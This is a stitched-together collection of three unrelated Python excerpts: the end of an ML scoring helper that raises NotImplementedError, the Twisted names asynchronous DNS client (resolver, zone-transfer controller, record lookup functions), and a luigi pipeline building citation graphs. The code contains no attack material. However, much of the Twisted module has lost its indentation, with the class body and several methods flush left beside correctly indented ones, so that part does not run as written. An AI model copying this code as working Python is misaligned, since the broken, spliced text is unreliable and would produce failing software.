    raises NotImplementedError because the `embed` scorer it used no
    longer exists. The dataset/label construction below is therefore
    dead work kept for when the scorer is restored.

    Parameters
    ----------
    valid_repr : numpy array
        Representation of the validation set.
    test_repr : numpy array
        Representation of the test set.

    Returns
    -------
    Never returns; raises NotImplementedError (see above).
    """
    # Concatenate the sets, and give different one hot labels for valid and test
    n_valid = valid_repr.shape[0]
    n_test = test_repr.shape[0]
    _labvalid = numpy.hstack((numpy.ones((n_valid, 1)),
                              numpy.zeros((n_valid, 1))))
    _labtest = numpy.hstack((numpy.zeros((n_test, 1)),
                             numpy.ones((n_test, 1))))
    dataset = numpy.vstack((valid_repr, test_repr))
    label = numpy.vstack((_labvalid, _labtest))
    logger.info('... computing the ALC')
    raise NotImplementedError("This got broken by embed no longer being "
                              "where it used to be (if it even still exists, I haven't "
                              "looked for it)")
    # return embed.score(dataset, label)
def lookup_alc(data, transform):
    """Apply *transform* to the valid (data[1]) and test (data[2]) shared
    variables and return their ALC score (see compute_alc)."""
    representations = [transform(subset.get_value(borrow=True))
                       for subset in data[1:3]]
    return compute_alc(representations[0], representations[1])
| |
# -*- test-case-name: twisted.names.test.test_names -*-
# Copyright (c) 2001-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Asynchronous client DNS
The functions exposed in this module can be used for asynchronous name
resolution and dns queries.
If you need to create a resolver with specific requirements, such as needing to
do queries against a particular host, the L{createResolver} function will
return an C{IResolver}.
Future plans: Proper nameserver acquisition on Windows/MacOS,
better caching, respect timeouts
@author: Jp Calderone
"""
import os
import errno
import warnings
from zope.interface import implements
# Twisted imports
from twisted.python.runtime import platform
from twisted.internet import error, defer, protocol, interfaces
from twisted.python import log, failure
from twisted.python.deprecate import getWarningMethod
from twisted.names import dns, common
class Resolver(common.ResolverBase):
"""
@ivar _waiting: A C{dict} mapping tuple keys of query name/type/class to
Deferreds which will be called back with the result of those queries.
This is used to avoid issuing the same query more than once in
parallel. This is more efficient on the network and helps avoid a
"birthday paradox" attack by keeping the number of outstanding requests
for a particular query fixed at one instead of allowing the attacker to
raise it to an arbitrary number.
@ivar _reactor: A provider of L{IReactorTCP}, L{IReactorUDP}, and
L{IReactorTime} which will be used to set up network resources and
track timeouts.
"""
implements(interfaces.IResolver)
index = 0
timeout = None
factory = None
servers = None
dynServers = ()
pending = None
connections = None
resolv = None
_lastResolvTime = None
_resolvReadInterval = 60
    def _getProtocol(self):
        # Deprecated accessor kept for backward compatibility: creates a
        # datagram protocol bound to this resolver and caches it on the
        # instance (see _connectedProtocol for why that is undesirable).
        getWarningMethod()(
            "Resolver.protocol is deprecated; use Resolver.queryUDP instead.",
            PendingDeprecationWarning,
            stacklevel=0)
        self.protocol = dns.DNSDatagramProtocol(self)
        return self.protocol
    # The instance attribute assigned above shadows this class-level
    # property, so the deprecation warning fires only on first access.
    protocol = property(_getProtocol)
    def __init__(self, resolv=None, servers=None, timeout=(1, 3, 11, 45), reactor=None):
        """
        Construct a resolver which will query domain name servers listed in
        the C{resolv.conf(5)}-format file given by C{resolv} as well as
        those in the given C{servers} list.  Servers are queried in a
        round-robin fashion.  If given, C{resolv} is periodically checked
        for modification and re-parsed if it is noticed to have changed.

        @type servers: C{list} of C{(str, int)} or C{None}
        @param servers: If not None, interpreted as a list of (host, port)
            pairs specifying addresses of domain name servers to attempt to use
            for this lookup.  Host addresses should be in IPv4 dotted-quad
            form.  If specified, overrides C{resolv}.

        @type resolv: C{str}
        @param resolv: Filename to read and parse as a resolver(5)
            configuration file.

        @type timeout: Sequence of C{int}
        @param timeout: Default number of seconds after which to reissue the
            query.  When the last timeout expires, the query is considered
            failed.

        @param reactor: A provider of L{IReactorTime}, L{IReactorUDP}, and
            L{IReactorTCP} which will be used to establish connections, listen
            for DNS datagrams, and enforce timeouts.  If not provided, the
            global reactor will be used.

        @raise ValueError: Raised if no nameserver addresses can be found.
        """
        common.ResolverBase.__init__(self)
        if reactor is None:
            # Import lazily so merely importing this module does not pull
            # in (and thereby install) the global reactor.
            from twisted.internet import reactor
        self._reactor = reactor
        self.timeout = timeout
        if servers is None:
            self.servers = []
        else:
            self.servers = servers
        self.resolv = resolv
        # At least one source of nameservers is required up front.
        if not len(self.servers) and not resolv:
            raise ValueError, "No nameservers specified"
        self.factory = DNSClientFactory(self, timeout)
        self.factory.noisy = 0   # Be quiet by default
        self.connections = []
        self.pending = []
        self._waiting = {}
        # Kick off (and schedule) resolv.conf parsing if a file was given.
        self.maybeParseConfig()
def __getstate__(self):
d = self.__dict__.copy()
d['connections'] = []
d['_parseCall'] = None
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.maybeParseConfig()
    def maybeParseConfig(self):
        """Re-read the resolv.conf file if it changed, then reschedule
        another check in C{_resolvReadInterval} seconds.

        NOTE(review): uses the Python-2-only builtin ``file`` and
        ``except IOError, e`` syntax.
        """
        if self.resolv is None:
            # Don't try to parse it, don't set up a call loop
            return

        try:
            resolvConf = file(self.resolv)
        except IOError, e:
            if e.errno == errno.ENOENT:
                # Missing resolv.conf is treated the same as an empty resolv.conf
                self.parseConfig(())
            else:
                raise
        else:
            # Only reparse when the file's modification time changed.
            mtime = os.fstat(resolvConf.fileno()).st_mtime
            if mtime != self._lastResolvTime:
                log.msg('%s changed, reparsing' % (self.resolv,))
                self._lastResolvTime = mtime
                self.parseConfig(resolvConf)

        # Check again in a little while
        self._parseCall = self._reactor.callLater(
            self._resolvReadInterval, self.maybeParseConfig)
def parseConfig(self, resolvConf):
servers = []
for L in resolvConf:
L = L.strip()
if L.startswith('nameserver'):
resolver = (L.split()[1], dns.PORT)
servers.append(resolver)
log.msg("Resolver added %r to server list" % (resolver,))
elif L.startswith('domain'):
try:
self.domain = L.split()[1]
except IndexError:
self.domain = ''
self.search = None
elif L.startswith('search'):
try:
self.search = L.split()[1:]
except IndexError:
self.search = ''
self.domain = None
if not servers:
servers.append(('127.0.0.1', dns.PORT))
self.dynServers = servers
def pickServer(self):
"""
Return the address of a nameserver.
TODO: Weight servers for response time so faster ones can be
preferred.
"""
if not self.servers and not self.dynServers:
return None
serverL = len(self.servers)
dynL = len(self.dynServers)
self.index += 1
self.index %= (serverL + dynL)
if self.index < serverL:
return self.servers[self.index]
else:
return self.dynServers[self.index - serverL]
    def _connectedProtocol(self):
        """
        Return a new L{DNSDatagramProtocol} bound to a randomly selected port
        number.
        """
        if 'protocol' in self.__dict__:
            # Some code previously asked for or set the deprecated `protocol`
            # attribute, so it probably expects that object to be used for
            # queries.  Give it back and skip the super awesome source port
            # randomization logic.  This is actually a really good reason to
            # remove this deprecated backward compatibility as soon as
            # possible. -exarkun
            return self.protocol
        proto = dns.DNSDatagramProtocol(self)
        # Keep drawing random source ports until one is free; a port
        # collision raises CannotListenError and we simply try again.
        while True:
            try:
                self._reactor.listenUDP(dns.randomSource(), proto)
            except error.CannotListenError:
                pass
            else:
                return proto
def connectionMade(self, protocol):
self.connections.append(protocol)
for (d, q, t) in self.pending:
self.queryTCP(q, t).chainDeferred(d)
del self.pending[:]
    def messageReceived(self, message, protocol, address = None):
        # Replies are matched to their queries elsewhere; anything arriving
        # here was unsolicited, so just log it.
        log.msg("Unexpected message (%d) received from %r" % (message.id, address))
def _query(self, *args):
"""
Get a new L{DNSDatagramProtocol} instance from L{_connectedProtocol},
issue a query to it using C{*args}, and arrange for it to be
disconnected from its transport after the query completes.
@param *args: Positional arguments to be passed to
L{DNSDatagramProtocol.query}.
@return: A L{Deferred} which will be called back with the result of the
query.
"""
protocol = self._connectedProtocol()
d = protocol.query(*args)
def cbQueried(result):
protocol.transport.stopListening()
return result
d.addBoth(cbQueried)
return d
def queryUDP(self, queries, timeout = None):
"""
Make a number of DNS queries via UDP.
@type queries: A C{list} of C{dns.Query} instances
@param queries: The queries to make.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
@raise C{twisted.internet.defer.TimeoutError}: When the query times
out.
"""
if timeout is None:
timeout = self.timeout
addresses = self.servers + list(self.dynServers)
if not addresses:
return defer.fail(IOError("No domain name servers available"))
# Make sure we go through servers in the list in the order they were
# specified.
addresses.reverse()
used = addresses.pop()
d = self._query(used, queries, timeout[0])
d.addErrback(self._reissue, addresses, [used], queries, timeout)
return d
    def _reissue(self, reason, addressesLeft, addressesUsed, query, timeout):
        """Errback: retry a timed-out UDP query against the next server.

        Cycles through *addressesLeft*; when exhausted, advances to the
        next (longer) timeout value and starts over with all addresses.
        Fails with L{defer.TimeoutError} once every timeout value has
        been consumed. Non-timeout failures propagate unchanged.
        """
        # Only DNS query timeouts are retried; anything else re-raises.
        reason.trap(dns.DNSQueryTimeoutError)

        # If there are no servers left to be tried, adjust the timeout
        # to the next longest timeout period and move all the
        # "used" addresses back to the list of addresses to try.
        if not addressesLeft:
            addressesLeft = addressesUsed
            addressesLeft.reverse()
            addressesUsed = []
            timeout = timeout[1:]

        # If all timeout values have been used this query has failed.  Tell the
        # protocol we're giving up on it and return a terminal timeout failure
        # to our caller.
        if not timeout:
            return failure.Failure(defer.TimeoutError(query))

        # Get an address to try.  Take it out of the list of addresses
        # to try and put it ino the list of already tried addresses.
        address = addressesLeft.pop()
        addressesUsed.append(address)

        # Issue a query to a server.  Use the current timeout.  Add this
        # function as a timeout errback in case another retry is required.
        d = self._query(address, query, timeout[0], reason.value.id)
        d.addErrback(self._reissue, addressesLeft, addressesUsed, query, timeout)
        return d
def queryTCP(self, queries, timeout = 10):
"""
Make a number of DNS queries via TCP.
@type queries: Any non-zero number of C{dns.Query} instances
@param queries: The queries to make.
@type timeout: C{int}
@param timeout: The number of seconds after which to fail.
@rtype: C{Deferred}
"""
if not len(self.connections):
address = self.pickServer()
if address is None:
return defer.fail(IOError("No domain name servers available"))
host, port = address
self._reactor.connectTCP(host, port, self.factory)
self.pending.append((defer.Deferred(), queries, timeout))
return self.pending[-1][0]
else:
return self.connections[0].query(queries, timeout)
def filterAnswers(self, message):
"""
Extract results from the given message.
If the message was truncated, re-attempt the query over TCP and return
a Deferred which will fire with the results of that query.
If the message's result code is not L{dns.OK}, return a Failure
indicating the type of error which occurred.
Otherwise, return a three-tuple of lists containing the results from
the answers section, the authority section, and the additional section.
"""
if message.trunc:
return self.queryTCP(message.queries).addCallback(self.filterAnswers)
if message.rCode != dns.OK:
return failure.Failure(self.exceptionForCode(message.rCode)(message))
return (message.answers, message.authority, message.additional)
    def _lookup(self, name, cls, type, timeout):
        """
        Build a L{dns.Query} for the given parameters and dispatch it via UDP.

        If this query is already outstanding, it will not be re-issued.
        Instead, when the outstanding query receives a response, that response
        will be re-used for this query as well.

        @type name: C{str}
        @type type: C{int}
        @type cls: C{int}

        @return: A L{Deferred} which fires with a three-tuple giving the
            answer, authority, and additional sections of the response or with
            a L{Failure} if the response code is anything other than C{dns.OK}.
        """
        key = (name, type, cls)
        waiting = self._waiting.get(key)
        if waiting is None:
            # First request for this (name, type, cls): issue it, and record
            # an (initially empty) list of other deferreds to notify when the
            # response arrives.
            self._waiting[key] = []
            d = self.queryUDP([dns.Query(name, type, cls)], timeout)
            def cbResult(result):
                # Fan the result (success or failure, via addBoth) out to
                # every deferred that piled up behind this query, then pass
                # it through unchanged.
                for d in self._waiting.pop(key):
                    d.callback(result)
                return result
            d.addCallback(self.filterAnswers)
            d.addBoth(cbResult)
        else:
            # An identical query is already in flight; piggyback on it.
            d = defer.Deferred()
            waiting.append(d)
        return d
# This one doesn't ever belong on UDP
def lookupZone(self, name, timeout = 10):
"""
Perform an AXFR request. This is quite different from usual
DNS requests. See http://cr.yp.to/djbdns/axfr-notes.html for
more information.
"""
address = self.pickServer()
if address is None:
return defer.fail(IOError('No domain name servers available'))
host, port = address
d = defer.Deferred()
controller = AXFRController(name, d)
factory = DNSClientFactory(controller, timeout)
factory.noisy = False #stfu
connector = self._reactor.connectTCP(host, port, factory)
controller.timeoutCall = self._reactor.callLater(
timeout or 10, self._timeoutZone, d, controller,
connector, timeout or 10)
return d.addCallback(self._cbLookupZone, connector)
def _timeoutZone(self, d, controller, connector, seconds):
connector.disconnect()
controller.timeoutCall = None
controller.deferred = None
d.errback(error.TimeoutError("Zone lookup timed out after %d seconds" % (seconds,)))
    def _cbLookupZone(self, result, connector):
        """
        Zone transfer finished: close the TCP connection and shape the
        records as a standard (answers, authority, additional) triple.
        """
        connector.disconnect()
        return (result, [], [])
class AXFRController:
    """
    Controller for a single AXFR (zone transfer) session.

    Accumulates answer records from one or more DNS messages and fires
    C{deferred} with the complete record list once the transfer is complete,
    i.e. once the closing SOA record has arrived.
    """
    # Delayed call that fails the transfer on timeout; cancelled on success.
    timeoutCall = None

    def __init__(self, name, deferred):
        self.name = name
        self.deferred = deferred
        self.soa = None      # the opening SOA record, once seen
        self.records = []    # all answer records accumulated so far

    def connectionMade(self, protocol):
        # dig sets recursion-desired to 0, so I will too
        message = dns.Message(protocol.pickID(), recDes=0)
        message.queries = [dns.Query(self.name, dns.AXFR, dns.IN)]
        protocol.writeMessage(message)

    def connectionLost(self, protocol):
        # XXX Do something here - see #3428
        pass

    def messageReceived(self, message, protocol):
        # Caveat: We have to handle two cases: All records are in 1
        # message, or all records are in N messages.
        # According to http://cr.yp.to/djbdns/axfr-notes.html,
        # 'authority' and 'additional' are always empty, and only
        # 'answers' is present.
        self.records.extend(message.answers)
        if not self.records:
            return
        if not self.soa:
            # The first record of a transfer should be the opening SOA.
            if self.records[0].type == dns.SOA:
                self.soa = self.records[0]
        if len(self.records) > 1 and self.records[-1].type == dns.SOA:
            # The second SOA closes the transfer: cancel the timeout and
            # deliver the accumulated records exactly once.
            if self.timeoutCall is not None:
                self.timeoutCall.cancel()
                self.timeoutCall = None
            if self.deferred is not None:
                self.deferred.callback(self.records)
                self.deferred = None
from twisted.internet.base import ThreadedResolver as _ThreadedResolverImpl
class ThreadedResolver(_ThreadedResolverImpl):
    """
    Deprecated alias for L{twisted.internet.base.ThreadedResolver}.

    Kept only for backwards compatibility; constructing one emits a
    C{DeprecationWarning} pointing callers at the new location.
    """
    def __init__(self, reactor=None):
        if reactor is None:
            from twisted.internet import reactor
        _ThreadedResolverImpl.__init__(self, reactor)
        warnings.warn(
            "twisted.names.client.ThreadedResolver is deprecated since "
            "Twisted 9.0, use twisted.internet.base.ThreadedResolver "
            "instead.",
            category=DeprecationWarning, stacklevel=2)
class DNSClientFactory(protocol.ClientFactory):
    """
    Factory producing stream (TCP) DNS protocol instances, each wired to
    the given controller object.
    """
    def __init__(self, controller, timeout = 10):
        self.controller = controller
        self.timeout = timeout

    def clientConnectionLost(self, connector, reason):
        # Losing the connection is not treated as an error here.
        pass

    def buildProtocol(self, addr):
        protocolInstance = dns.DNSProtocol(self.controller)
        protocolInstance.factory = self
        return protocolInstance
def createResolver(servers=None, resolvconf=None, hosts=None):
    """
    Create and return a Resolver.

    @type servers: C{list} of C{(str, int)} or C{None}
    @param servers: If not C{None}, interpreted as a list of addresses of
    domain name servers to attempt to use. Addresses should be in dotted-quad
    form.

    @type resolvconf: C{str} or C{None}
    @param resolvconf: If not C{None}, on posix systems will be interpreted as
    an alternate resolv.conf to use. Will do nothing on windows systems. If
    C{None}, /etc/resolv.conf will be used.

    @type hosts: C{str} or C{None}
    @param hosts: If not C{None}, an alternate hosts file to use. If C{None}
    on posix systems, /etc/hosts will be used. On windows, C:\\windows\\hosts
    will be used.

    @rtype: C{IResolver}
    """
    from twisted.names import resolve, cache, root, hosts as hostsModule
    if platform.getType() == 'posix':
        # POSIX: servers come from resolv.conf, names from /etc/hosts.
        if resolvconf is None:
            resolvconf = '/etc/resolv.conf'
        if hosts is None:
            hosts = '/etc/hosts'
        theResolver = Resolver(resolvconf, servers)
        hostResolver = hostsModule.Resolver(hosts)
    else:
        # Windows: no resolv.conf, so bootstrap from the root servers using
        # the reactor's threaded (platform) resolver.
        if hosts is None:
            hosts = r'c:\windows\hosts'
        from twisted.internet import reactor
        bootstrap = _ThreadedResolverImpl(reactor)
        hostResolver = hostsModule.Resolver(hosts)
        theResolver = root.bootstrap(bootstrap)
    # Resolution order: hosts file, then cache, then the real resolver.
    L = [hostResolver, cache.CacheResolver(), theResolver]
    return resolve.ResolverChain(L)
# Lazily-created process-global resolver shared by the module-level lookup
# functions; see getResolver().
theResolver = None
def getResolver():
    """
    Return the module-global resolver, creating it on first use.

    If C{createResolver()} raises C{ValueError}, fall back to a resolver
    pointed at localhost.

    @rtype: C{IResolver}
    """
    global theResolver
    if theResolver is not None:
        return theResolver
    try:
        resolver = createResolver()
    except ValueError:
        resolver = createResolver(servers=[('127.0.0.1', 53)])
    theResolver = resolver
    return theResolver
def getHostByName(name, timeout=None, effort=10):
    """
    Resolve a name to a valid ipv4 or ipv6 address.

    Will errback with C{DNSQueryTimeoutError} on a timeout, C{DomainError} or
    C{AuthoritativeDomainError} (or subclasses) on other errors.

    @type name: C{str}
    @param name: DNS name to resolve.

    @type timeout: Sequence of C{int}
    @param timeout: Number of seconds after which to reissue the query.
        When the last timeout expires, the query is considered failed.

    @type effort: C{int}
    @param effort: How many times CNAME and NS records to follow while
        resolving this name.

    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.getHostByName(name, timeout, effort)
def lookupAddress(name, timeout=None):
    """
    Perform an A record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupAddress(name, timeout)

def lookupIPV6Address(name, timeout=None):
    """
    Perform an AAAA record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupIPV6Address(name, timeout)

def lookupAddress6(name, timeout=None):
    """
    Perform an A6 record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupAddress6(name, timeout)

def lookupMailExchange(name, timeout=None):
    """
    Perform an MX record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupMailExchange(name, timeout)

def lookupNameservers(name, timeout=None):
    """
    Perform an NS record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupNameservers(name, timeout)

def lookupCanonicalName(name, timeout=None):
    """
    Perform a CNAME record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupCanonicalName(name, timeout)
def lookupMailBox(name, timeout=None):
    """
    Perform an MB record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupMailBox(name, timeout)

def lookupMailGroup(name, timeout=None):
    """
    Perform an MG record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupMailGroup(name, timeout)

def lookupMailRename(name, timeout=None):
    """
    Perform an MR record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupMailRename(name, timeout)

def lookupPointer(name, timeout=None):
    """
    Perform a PTR record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupPointer(name, timeout)

def lookupAuthority(name, timeout=None):
    """
    Perform an SOA record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupAuthority(name, timeout)

def lookupNull(name, timeout=None):
    """
    Perform a NULL record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupNull(name, timeout)
def lookupWellKnownServices(name, timeout=None):
    """
    Perform a WKS record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupWellKnownServices(name, timeout)

def lookupService(name, timeout=None):
    """
    Perform an SRV record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupService(name, timeout)

def lookupHostInfo(name, timeout=None):
    """
    Perform a HINFO record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupHostInfo(name, timeout)

def lookupMailboxInfo(name, timeout=None):
    """
    Perform an MINFO record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupMailboxInfo(name, timeout)

def lookupText(name, timeout=None):
    """
    Perform a TXT record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupText(name, timeout)

def lookupResponsibility(name, timeout=None):
    """
    Perform an RP record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupResponsibility(name, timeout)
def lookupAFSDatabase(name, timeout=None):
    """
    Perform an AFSDB record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupAFSDatabase(name, timeout)

def lookupZone(name, timeout=None):
    """
    Perform an AXFR (zone transfer) lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: C{int}
    @param timeout: When this timeout expires, the query is considered
        failed.
    @rtype: C{Deferred}
    """
    # XXX: unlike every other lookup function here, timeout is a single
    # int rather than a sequence of ints.
    resolver = getResolver()
    return resolver.lookupZone(name, timeout)

def lookupAllRecords(name, timeout=None):
    """
    Perform an ALL_RECORD lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupAllRecords(name, timeout)

def lookupNamingAuthorityPointer(name, timeout=None):
    """
    Perform a NAPTR record lookup via the shared resolver.

    @type name: C{str}
    @param name: DNS name to resolve.
    @type timeout: Sequence of C{int}
    @param timeout: Per-attempt timeouts in seconds; the query fails once
        the last one expires.
    @rtype: C{Deferred}
    """
    resolver = getResolver()
    return resolver.lookupNamingAuthorityPointer(name, timeout)
| |
import csv
import pandas as pd
import igraph
import luigi
import util
import aminer
import filtering
import config
class YearFilterableTask(util.YearFilterableTask):
    """Same behaviour as util.YearFilterableTask, but anchors all outputs
    under the configured graph directory."""
    @property
    def base_dir(self):
        # Directory under which this module's task outputs are written.
        return config.graph_dir
class BuildPaperCitationGraph(YearFilterableTask):
    """Build the citation graph for all papers. For each paper, a link is drawn
    between it and all of its references. The venue of its publication and its
    list of authors are added as node attributes. The graph is saved in both
    pickle.gz and graphml.gz format. Both formats are used because pickle allows
    inclusion of the `author_ids` attributes of the nodes, which consists of a
    list of all authors of the paper. Graphml on the other hand, is a simpler
    and more space-efficient format, which will only save the venues as node
    attributes.
    """
    def requires(self):
        # TODO: consider using single dependency on FilterPapersToYearRange
        return (filtering.FilteredCSVPapers(self.start, self.end),
                filtering.FilteredCSVRefs(self.start, self.end),
                filtering.FilterAuthorshipsToYearRange(self.start, self.end))

    @property
    def papers_file(self):
        """Filtered papers CSV (first dependency)."""
        return self.input()[0]

    @property
    def refs_file(self):
        """Filtered references CSV (second dependency)."""
        return self.input()[1]

    @property
    def author_file(self):
        """Filtered authorship CSV (third dependency)."""
        return self.input()[2]

    @property
    def base_paths(self):
        return ('paper-citation-graph.pickle.gz',
                'paper-citation-graph.graphml.gz',
                'paper-id-to-node-id-map.csv')

    @property
    def pickle_output_file(self):
        return self.output()[0]

    @property
    def graphml_output_file(self):
        return self.output()[1]

    @property
    def idmap_output_file(self):
        return self.output()[2]

    def read_paper_vertices(self):
        """Return the paper IDs from the paper csv file (first column)."""
        with self.papers_file.open() as papers_file:
            papers_df = pd.read_csv(papers_file, header=0, usecols=(0,))
            return papers_df['id'].values

    def read_paper_venues(self):
        """Iterate through (paper_id, venue) pairs from the paper csv file."""
        for record in util.iter_csv_fwrapper(self.papers_file):
            yield (record[0], record[2])

    def read_paper_references(self, idmap):
        """Yield (citing, cited) node-id pairs, filtering out references to
        papers outside the dataset (i.e. IDs missing from `idmap`)."""
        for paper_id, ref_id in util.iter_csv_fwrapper(self.refs_file):
            # Only a missing ID is expected here; the previous bare
            # `except: pass` would also have hidden genuine bugs.
            try:
                yield (idmap[paper_id], idmap[ref_id])
            except KeyError:
                continue

    def run(self):
        refg = igraph.Graph()
        nodes = self.read_paper_vertices()
        refg.add_vertices(nodes)
        # Build and save paper id to node id mapping
        idmap = {str(v['name']): v.index for v in refg.vs}
        rows = sorted(idmap.items())
        util.write_csv_to_fwrapper(
            self.idmap_output_file, ('paper_id', 'node_id'), rows)
        # Now add venues to nodes as paper attributes
        for paper_id, venue in self.read_paper_venues():
            node_id = idmap[paper_id]
            refg.vs[node_id]['venue'] = venue
        # next add author ids
        for v in refg.vs:
            v['author_ids'] = []
        for author_id, paper_id in util.iter_csv_fwrapper(self.author_file):
            node_id = idmap[paper_id]
            refg.vs[node_id]['author_ids'].append(author_id)
        # Finally add edges from citation records
        citation_links = self.read_paper_references(idmap)
        refg.add_edges(citation_links)
        # Save in both pickle and graphml formats
        refg.write_picklez(self.pickle_output_file.path)
        refg.write_graphmlz(self.graphml_output_file.path)
        return refg
class PickledPaperCitationGraph(YearFilterableTask):
    """Expose only the pickled paper citation graph as a task target."""
    def requires(self):
        return BuildPaperCitationGraph(self.start, self.end)

    def output(self):
        # First output of BuildPaperCitationGraph is the pickle.gz file.
        pickled = self.input()[0]
        return luigi.LocalTarget(pickled.path)
class PaperCitationGraphIdmap(YearFilterableTask):
    """Expose only the paper-id-to-node-id map as a task target."""
    def requires(self):
        return BuildPaperCitationGraph(self.start, self.end)

    def output(self):
        # Third output of BuildPaperCitationGraph is the id map csv.
        idmap = self.input()[2]
        return luigi.LocalTarget(idmap.path)
class BuildAuthorCitationGraph(YearFilterableTask):
    """Build the author citation graph from the paper citation graph and the
    authorship csv records.
    """
    def requires(self):
        return (filtering.FilterAuthorshipsToYearRange(self.start, self.end),
                PaperCitationGraphIdmap(self.start, self.end),
                PickledPaperCitationGraph(self.start, self.end))

    @property
    def author_file(self):
        return self.input()[0]

    @property
    def paper_idmap_file(self):
        return self.input()[1]

    @property
    def paper_graph_file(self):
        return self.input()[2]

    @property
    def base_paths(self):
        return ('author-citation-graph.graphml.gz',
                'author-id-to-node-id-map.csv')

    def read_author_ids(self):
        """Read author ids from author file and return as strings (for easy
        reference when adding edges).
        """
        with self.author_file.open() as f:
            df = pd.read_csv(f, header=0, usecols=(0,))
            return df['author_id'].astype(str).values

    def get_edges(self):
        """Yield every author-to-author citation edge implied by the
        (author, paper) authorship records."""
        records = util.iter_csv_fwrapper(self.paper_idmap_file)
        idmap = {record[0]: int(record[1]) for record in records}
        refg = igraph.Graph.Read_Picklez(self.paper_graph_file.open())
        records = util.iter_csv_fwrapper(self.author_file)
        # A plain for loop replaces the old `while True: rows.next()`
        # pattern, which terminated the generator by leaking StopIteration
        # (disallowed by PEP 479) and used the Python-2-only .next().
        for author_id, paper_id in records:
            edges = self.get_paper_edges(refg, idmap[paper_id], author_id)
            for edge in edges:
                yield edge

